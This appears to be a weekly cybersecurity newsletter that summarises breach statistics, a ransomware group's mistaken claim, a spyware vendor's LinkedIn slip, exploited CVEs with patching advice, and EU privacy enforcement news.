Sinobi’s Ransomware Own Goal, Spyware Slip-Ups & Critical CVEs You Can’t Ignore

A total of 18 breach events were found and analysed resulting in 14,712,764 exposed accounts containing a total of 29 different data types of personal datum. The breaches found publicly and freely available included ULP Alein Txt File - Episode 33, Stealer Log 0552, Substack, France Data Home Owners and National Union of School Sports. Sign in to view the full library of breach events which includes, where available, reference articles relating to each breach.

Data Breach Impact

A lighter haul this week, but let’s not get too comfortable. 18 breach events were uncovered, leaking over 14 million accounts and 29 types of personal data into the wild. From niche logs like ULP's latest alien episode to more recognisable names like Substack, the damage is still real. Even modest leaks can carry heavyweight consequences for third party organisations, especially when employee data is caught up in the mess. For individuals, it’s yet another round of digital exposure, fuelling phishing attempts, fraud, and the slow erosion of personal privacy. Smaller scale, same old story: if it’s online, it’s in the firing line.

Cyber Update

The Sinobi ransomware group had what can only be described as a PR own goal last week. With great fanfare, they posted on their darknet blog: “WE RANSOMED THE ANTI-RANSOMWARE COMPANY.” Bold claim. Very cinematic. There’s just one tiny problem. They hadn’t.

Sinobi appeared to believe they had successfully compromised Halcyon.ai, a US cybersecurity firm whose entire brand identity revolves around stopping ransomware. Their homepage slogan? “Detect. Disrupt. Defeat Ransomware.” Punchy. Memorable. Slightly awkward if you’ve just been breached by the very thing you’re fighting.

Except… they hadn’t been breached at all.

As researchers began pulling down the leaked data, it became clear the victim wasn’t Halcyon.ai but HalcyonTek, a completely separate organisation based in India with a vaguely similar name. In short: wrong Halcyon. Wrong continent. Wrong flex.

Sinobi, who surfaced mid-summer last year and have since hit over 40 organisations, largely in manufacturing and production, suddenly went from cyber boogeyman to cautionary tale. Ransomware is ruthless, but brand confusion is undefeated.

Spyware Company Accidentally Shows the “Click to Hack” Button. But wait, the week’s operational security mishaps don’t stop there.

Enter Paragon, an Israeli surveillance company behind a spyware platform called Graphite. The tool is marketed to governments and, shall we say, “privacy flexible” customers. Graphite is designed to covertly infect mobile phones, allowing operators to monitor calls, messages, apps and media without the target knowing. Billion-dollar surveillance energy.

Now here’s where it gets spicy. Paragon posted a cheerful selfie to LinkedIn featuring two employees. Harmless enough. Except in the background was something never previously shown publicly: the Graphite dashboard.

Zoom in and you can see:
- A victim’s mobile number displayed top right (originating from Czechia, partially obscured).
- A list of apps on the compromised device.
- Messaging logs in the centre.
- Browsable messages, photos and videos on the right.

And, because subtlety is overrated, a rather large button labelled: “click to hack.” You truly couldn’t script it better. A company selling stealth-grade spyware accidentally showcasing its live interface on LinkedIn. Somewhere, an opsec manager felt a disturbance in the force.

Meanwhile, cybercrime forums operating on the clearnet are playing an increasingly exhausting game of digital whack-a-mole. Registrars have been far more proactive recently, suspending domains used by criminal forums with noticeable frequency. Monthly disruptions are becoming the norm. It’s not fatal, these sites typically migrate within 24–48 hours, but it’s undeniably inconvenient.

One well known English speaking forum has taken its users on quite the world tour recently: Japan → West Africa → American Samoa. At this point, their domain strategy resembles a gap year.

The takedowns don’t kill the communities, but they do create friction, and friction, over time, adds pressure. Whether this global tightening continues remains to be seen, but for now, registrars appear to be flexing just a little harder than usual.

Software Vulnerabilities

BeyondTrust (CVE-2026-1731) is the headline act. A pre-auth remote code execution flaw in Remote Support and Privileged Remote Access. Translation? If unpatched and internet-facing, your “secure remote help” tool becomes an attacker’s golden ticket. BeyondTrust says exploitation attempts are already in play, CISA’s KEV has it flagged as actively exploited, and the remediation deadline was… brisk. SaaS customers are covered. Self-hosted stragglers? Less so.

What it means: If someone pops your remote access appliance, they’re basically standing in the server room holding the master keys. Lateral movement and credential harvesting become alarmingly efficient.

Do now: Patch to the fixed versions (RS 25.3.2+, PRA 25.1.1+ or BT26-02), lock down inbound access, review appliance logs for anything dodgy, and rotate secrets like you mean it.

Microsoft ConfigMgr / SCCM (CVE-2024-43468) is a CVSS 9.8 SQL injection that allows unauthenticated command execution. Yes, unauthenticated. Yes, against your management plane. It’s been in the wild, it’s on KEV, and patches have existed since October 2024. If you’re still vulnerable, that’s not zero-day drama, that’s patch procrastination.

What it means: A compromised ConfigMgr site is a deployment cannon pointed at your entire estate. Malware at scale? Absolutely. Persistence? Delightfully easy (for the attacker).

Do now: Patch every site role, restrict and monitor access to site systems like they’re crown jewels, and review for unexplained admin actions or suspicious database commands.

Apple dyld (CVE-2026-20700) involves memory corruption and has reportedly been used in “extremely sophisticated” targeted attacks. That’s Apple’s polite way of saying “this isn’t theoretical”. Fixed in iOS/iPadOS 26.3 and equivalents. Also on KEV.

What it means: Today’s bespoke espionage technique is tomorrow’s off-the-shelf exploit kit. VIPs first, everyone else shortly after.

Do now: Enforce OS updates via MDM, verify compliance (don’t just tick the dashboard), and harden high-risk users, tighter app controls, fewer dodgy links, more scrutiny.

SolarWinds Web Help Desk (CVE-2025-40536) allows unauthenticated access to restricted functionality. It sounds mild. It isn’t. Fixed in WHD 2026.1, alongside several other serious flaws. KEV due date was urgent enough to raise eyebrows.

What it means: Help desks are treasure troves, credentials, tickets, workflows. A “control bypass” can quickly become a staging ground.

Do now: Upgrade to 2026.1 or pull it off the internet until you can. Audit for unknown admin changes. Lock down exposed interfaces and default credentials (because yes, attackers will try “admin/admin”).

Microsoft MSHTML (CVE-2026-21513) is a security feature bypass with a CVSS 8.8. Exploited. Requires user interaction. So, classic lure-and-click territory. It’s the sort of bug attackers chain with others because it “plays well with friends”.

What it means: Think phishing email → malicious HTML → bypass → payload. It’s rarely a solo act.

Do now: Deploy February 2026 updates across supported Windows systems, reinforce anti-phishing controls, and monitor for suspicious child processes spawned from Office or browser contexts.

Data & Privacy Headlines

Odido (Netherlands) disclosed a cyber-attack impacting customer contact system data. No passwords or billing info, but contact data alone is prime phishing fuel. They’ve warned customer notifications may take up to 48 hours. Not the sentence you want in your crisis script.

Impact: Expect telco-themed scams with frightening credibility. Employees affected as consumers can become your next internal phishing victim.

Do now: Brief SOC and fraud teams, remind staff to verify “account issues” out-of-band, and tighten controls around payment or supplier detail changes.

Conduent supply-chain spillover (Volvo Group North America) shows the third-party blast radius in full effect. Nearly 17,000 individuals impacted, breach window stretching months, notifications rolling out with identity monitoring attached. Conduent had disclosed its own incident previously. Dominoes fall.

Impact: It’s not just “vendor got breached” it’s regulatory scrutiny, comms overhead, and fraud risk landing downstream.

Do now: Review which vendors handle large-scale PII/PHI, validate notification clauses, and treat processors and mailrooms like critical suppliers, not background noise.

CJEU & WhatsApp vs the EDPB, the EU’s top court says binding EDPB decisions can be challenged. The €225m fine context adds flavour. This could reshape dispute-resolution dynamics under GDPR.

Impact: Enforcement timelines and leverage in cross-border cases may get… interesting. Procedure matters as much as substance.

Do now: Privacy and legal teams should track developments, revisit enforcement-risk assumptions, and document decisions with future scrutiny in mind.

EDPB 2026–2027 Work Programme promises guidance on anonymisation, legitimate interest, children’s data, consent-or-pay models, and GDPR/AI Act interplay. In other words, they’re sharpening the blurry edges.

Impact: If you lean heavily on legitimate interest, AI processing, or bold anonymisation claims, your compliance baseline may shift.

Do now: Map dependencies, prepare to refresh templates and DPIAs, and keep governance calendars flexible.

CNIL’s 2025 enforcement scoreboard: 83 sanctions, 259 decisions, and nearly €487m in cumulative fines. Themes? Cookies, employee monitoring, and good old-fashioned security basics.

Impact: Regulators still care deeply about trackers and internal surveillance. And “boring” control failures keep showing up in penalty write-ups.

Do now: Audit cookie consent flows, re-check employee monitoring transparency, and run a quick hygiene sweep on passwords, shared accounts, and access controls.

Smarter Protection Starts with Awareness

Third-party exposure is now a first-order risk. You can’t patch what you can’t see.
Free Data Breach Exposure Scan: Check any domain in seconds: https://breachaware.com/scan